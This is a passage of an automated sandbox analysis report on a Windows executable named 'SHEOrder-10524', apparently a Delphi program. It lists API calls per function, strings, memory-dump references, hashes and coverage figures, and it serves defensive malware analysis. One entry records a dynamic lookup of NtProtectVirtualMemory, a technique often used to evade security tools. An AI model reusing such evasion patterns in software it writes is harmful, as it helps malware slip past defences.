                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                    • API String ID: 4232894706-2493093252
                                                                                                                                                                    • Opcode ID: e6d97d9c03df75461a499c359ff9a156872aaedab1a9ae984f44deaa5c206f91
                                                                                                                                                                    • Instruction ID: 9ef2b031774bc78cf9abe9926afd6c53f386040b82b7ba716e97f05ab1374bb3
                                                                                                                                                                    • Opcode Fuzzy Hash: e6d97d9c03df75461a499c359ff9a156872aaedab1a9ae984f44deaa5c206f91
                                                                                                                                                                    • Instruction Fuzzy Hash: EE611F3CB011489BDB04EBACD850A9F77B7AB48300F30947DE145EB745CB39D94A8B96
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028C43E7,?,?,029237C8,?,?,028EB7A8,028C6575,028EA305), ref: 028C4359
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028C43E7,?,?,029237C8,?,?,028EB7A8,028C6575,028EA305), ref: 028C435F
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,028C43A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028C43E7,?,?,029237C8), ref: 028C4374
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,028C43A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028C43E7,?,?), ref: 028C437A
                                                                                                                                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 028C4398
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileHandleWrite$Message
                                                                                                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                                                                                                    • API String ID: 1570097196-2970929446
                                                                                                                                                                    • Opcode ID: 89524548537e4e38bae77bb354a2cac189b1f5f144c13ef7aaac1934bb94fe93
                                                                                                                                                                    • Instruction ID: d4cbb99287bf40faf1130da2e3775533530640270d9d82e3d950987c8bd239f5
                                                                                                                                                                    • Opcode Fuzzy Hash: 89524548537e4e38bae77bb354a2cac189b1f5f144c13ef7aaac1934bb94fe93
                                                                                                                                                                    • Instruction Fuzzy Hash: 97F02B6CEC434479FF20A2746C9AF69374C1781B15F34561EB21CD45C387B8C0E84B26
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 028CACF8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 028CAD15
                                                                                                                                                                      • Part of subcall function 028CACF8: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028CAD39
                                                                                                                                                                      • Part of subcall function 028CACF8: GetModuleFileNameA.KERNEL32(028C0000,?,00000105), ref: 028CAD54
                                                                                                                                                                      • Part of subcall function 028CACF8: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028CADEA
                                                                                                                                                                    • CharToOemA.USER32(?,?), ref: 028CAEB7
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 028CAED4
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028CAEDA
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,028CAF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028CAEEF
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,028CAF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028CAEF5
                                                                                                                                                                    • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 028CAF17
                                                                                                                                                                    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 028CAF2D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 185507032-0
                                                                                                                                                                    • Opcode ID: 8869146295693f390181f3fa794d4c5d05377033396299dad13a8f815514c879
                                                                                                                                                                    • Instruction ID: d4f5671a89dddafde3beee48d6aa2f0628ed076e5720a5f504ca6ef89dcef1c4
                                                                                                                                                                    • Opcode Fuzzy Hash: 8869146295693f390181f3fa794d4c5d05377033396299dad13a8f815514c879
                                                                                                                                                                    • Instruction Fuzzy Hash: FE1191BE5582087ED600FB98CC81F9B73EDAB84700F600A3DB254D60E0EB74E9448B27
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 028CE5E1
                                                                                                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 028CE5FD
                                                                                                                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 028CE636
                                                                                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 028CE6B3
                                                                                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 028CE6CC
                                                                                                                                                                    • VariantCopy.OLEAUT32(?,00000000), ref: 028CE701
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 351091851-0
                                                                                                                                                                    • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                                    • Instruction ID: d4083becb654e2e7167a8d0c4cdfb248bd15ea6c93ed9467b7dc00e2cd125011
                                                                                                                                                                    • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                                    • Instruction Fuzzy Hash: AC51E7BD9106299BCB22EB58C890BD9B3BDAF49300F1041E9E509E7212D730EF85CF61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028C357E
                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,028C35CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028C35B1
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,028C35D4,00000000,?,00000004,00000000,028C35CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028C35C7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                    • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                    • API String ID: 3677997916-4173385793
                                                                                                                                                                    • Opcode ID: 183d6ecddebbce7404902fabfe18123a10e973492dc552c5073dc0bfc7b03064
                                                                                                                                                                    • Instruction ID: 3a3f663aeae2592cab2a6dc56fb4b25002102e65ae74ad4610c349810386186e
                                                                                                                                                                    • Opcode Fuzzy Hash: 183d6ecddebbce7404902fabfe18123a10e973492dc552c5073dc0bfc7b03064
                                                                                                                                                                    • Instruction Fuzzy Hash: EB01B57DA40218FAEB11DBD09D42FBDB3ECEB08710F6045A9BA14D6680E774D610DB55
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,028CAAA3,?,?,00000000), ref: 028CAA24
                                                                                                                                                                      • Part of subcall function 028CA780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028CA79E
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,028CAAA3,?,?,00000000), ref: 028CAA54
                                                                                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000004), ref: 028CAA5F
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,028CAAA3,?,?,00000000), ref: 028CAA7D
                                                                                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A994,00000000,00000000,00000003), ref: 028CAA88
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4102113445-0
                                                                                                                                                                    • Opcode ID: 9a15606c71b030323afcb048fd108e91d4d8f830f2dbce2cbec1817b6f79427f
                                                                                                                                                                    • Instruction ID: 681e6771037da986ff818f65f58c4b70acea2a0c3c863b2b648cfd5247d28788
                                                                                                                                                                    • Opcode Fuzzy Hash: 9a15606c71b030323afcb048fd108e91d4d8f830f2dbce2cbec1817b6f79427f
                                                                                                                                                                    • Instruction Fuzzy Hash: F701DF7D20021C6EF309AE788E12F5A72AEDB85720F714168E510E66C0E778DE104AAA
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,028CAC8C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 028CAAEB
                                                                                                                                                                      • Part of subcall function 028CA780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028CA79E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                                                                    • String ID: eeee$ggg$yyyy
                                                                                                                                                                    • API String ID: 4232894706-1253427255
                                                                                                                                                                    • Opcode ID: 2425c55df252c2fd29331bd0da204d98dac1bdbf715899c535a4518af65ee583
                                                                                                                                                                    • Instruction ID: bb68e033b088ba401935b012c54545e7d955b2cd515b9fd7a0312dcf988c8ff2
                                                                                                                                                                    • Opcode Fuzzy Hash: 2425c55df252c2fd29331bd0da204d98dac1bdbf715899c535a4518af65ee583
                                                                                                                                                                    • Instruction Fuzzy Hash: 7441BD3C70450C8BE719AFADC9A42BEB2ABEB85304F74456DE481D7344DB38DD069B22
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 028D7A09
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028D7A0F
                                                                                                                                                                    Strings
                                                                                                                                                                    • NtProtectVirtualMemory, xrefs: 028D79FF
                                                                                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 028D7A04
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                                                                                                                                    • API String ID: 1646373207-1386159242
                                                                                                                                                                    • Opcode ID: 90c45438aad7893845983ef7b5d5d7a2ec5b0d457464c8f7b1e3b1c1098ef310
                                                                                                                                                                    • Instruction ID: cc9588331284542df50a912025818dc9b05af03d4f23af3c9b1f03cd4143516d
                                                                                                                                                                    • Opcode Fuzzy Hash: 90c45438aad7893845983ef7b5d5d7a2ec5b0d457464c8f7b1e3b1c1098ef310
                                                                                                                                                                    • Instruction Fuzzy Hash: 35E0B6BE640209AF9B40EEDCED45D9B77ECAB182007005415BA19D7301D634E9259FB1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,028EA10B,00000000,028EA11E), ref: 028CC436
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 028CC447
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                    • API String ID: 1646373207-3712701948
                                                                                                                                                                    • Opcode ID: 7899015e704719417664096a92d4c26e183b0b0ae397832aaf73f172fcbeed5d
                                                                                                                                                                    • Instruction ID: 30703a8a705118fd5ac3f0fe740f7b2ff763d07ec7c02b0c09c07edc06cc2fbb
                                                                                                                                                                    • Opcode Fuzzy Hash: 7899015e704719417664096a92d4c26e183b0b0ae397832aaf73f172fcbeed5d
                                                                                                                                                                    • Instruction Fuzzy Hash: B6D05E7CA80325CEEF00ABF55480A3523D8A74474AB20C82EF119D9341D7B5C4148F51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 028CE253
                                                                                                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 028CE26F
                                                                                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 028CE2E6
                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 028CE30F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 920484758-0
                                                                                                                                                                    • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                    • Instruction ID: 026b1d70da754b0195c9cc27814239b7c05d166be13b41037ecdbad36327a8d4
                                                                                                                                                                    • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                    • Instruction Fuzzy Hash: B241F77DA002299FCB62EB58C890BC9B3BDAB48314F1041E9E64DE7615DB34EF808F55
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 028CAD15
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028CAD39
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(028C0000,?,00000105), ref: 028CAD54
                                                                                                                                                                    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028CADEA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3990497365-0
                                                                                                                                                                    • Opcode ID: 69a5ac93c4e62265df0e74a6020e495785402fe1a5946a40e331e3ad35518f28
                                                                                                                                                                    • Instruction ID: b36bc58d995db326696ab23378f25459a48c5715f3aa3bfb64d77b0b1386f683
                                                                                                                                                                    • Opcode Fuzzy Hash: 69a5ac93c4e62265df0e74a6020e495785402fe1a5946a40e331e3ad35518f28
                                                                                                                                                                    • Instruction Fuzzy Hash: D741627894025C9BDB21DF68CC84BDAB7FDAB08340F5040E9A648E7251D774DF848F51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 028CAD15
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028CAD39
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(028C0000,?,00000105), ref: 028CAD54
                                                                                                                                                                    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028CADEA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3990497365-0
                                                                                                                                                                    • Opcode ID: ddf3cf4d18aa6a3b9c5aa9cde9de65e5ce73ec4e6286a07cfe88fb0292dafdaa
                                                                                                                                                                    • Instruction ID: 7910ef0af3c2fc48e1076f73fb551c31b52bd0339905774889b24433766f0f66
                                                                                                                                                                    • Opcode Fuzzy Hash: ddf3cf4d18aa6a3b9c5aa9cde9de65e5ce73ec4e6286a07cfe88fb0292dafdaa
                                                                                                                                                                    • Instruction Fuzzy Hash: 3F415278A4025C9BDB21EF68CC84BDAB7FDAB08345F5040E9A648E7251DB74DF888F51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: bc658e47605f998e16e4e6fc553286525af1e3f6901aebd177c4da42d4039346
                                                                                                                                                                    • Instruction ID: d214cc1320c7298ae3d7bb8a802799040f605ed6764572c2e2c46b9354fc1141
                                                                                                                                                                    • Opcode Fuzzy Hash: bc658e47605f998e16e4e6fc553286525af1e3f6901aebd177c4da42d4039346
                                                                                                                                                                    • Instruction Fuzzy Hash: FAA1D5AE7106004BE718AA7C9CC83BDB3C69BC4225F38827EE21DCB787DB74C9558651
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,028C9596), ref: 028C952E
                                                                                                                                                                    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,028C9596), ref: 028C9534
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DateFormatLocaleThread
                                                                                                                                                                    • String ID: yyyy
                                                                                                                                                                    • API String ID: 3303714858-3145165042
                                                                                                                                                                    • Opcode ID: 6c9c9c245a022fa587062a042eb6f940e77b3e7893e72cddfa732d31c51d8d51
                                                                                                                                                                    • Instruction ID: 200126c5e4d769bb1012db4971ef0a197d5cea73a0f8dc9a8582035e3ecd47ae
                                                                                                                                                                    • Opcode Fuzzy Hash: 6c9c9c245a022fa587062a042eb6f940e77b3e7893e72cddfa732d31c51d8d51
                                                                                                                                                                    • Instruction Fuzzy Hash: AA21807DA012189BDB14DF68C851AFEB3B9EF48710F6140E9E909E7240E730DE44CBA6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 028D9FD0
                                                                                                                                                                    • IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 028DA000
                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000008), ref: 028DA01F
                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 028DA02B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Read$Write
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3448952669-0
                                                                                                                                                                    • Opcode ID: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                                                                                                                                                                    • Instruction ID: b84048126ad5089c77d1d9d0192a7786dfa00359b8c194d82580222b5dfac712
                                                                                                                                                                    • Opcode Fuzzy Hash: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                                                                                                                                                                    • Instruction Fuzzy Hash: B921D27C600219DBCB14DF69CC80BAE73A9EF88365F548519EE04D7381E734EC118BA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:5.2%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:3.7%
                                                                                                                                                                    Signature Coverage:17.1%
                                                                                                                                                                    Total number of Nodes:1917
                                                                                                                                                                    Total number of Limit Nodes:81
                                                                                                                                                                    execution_graph
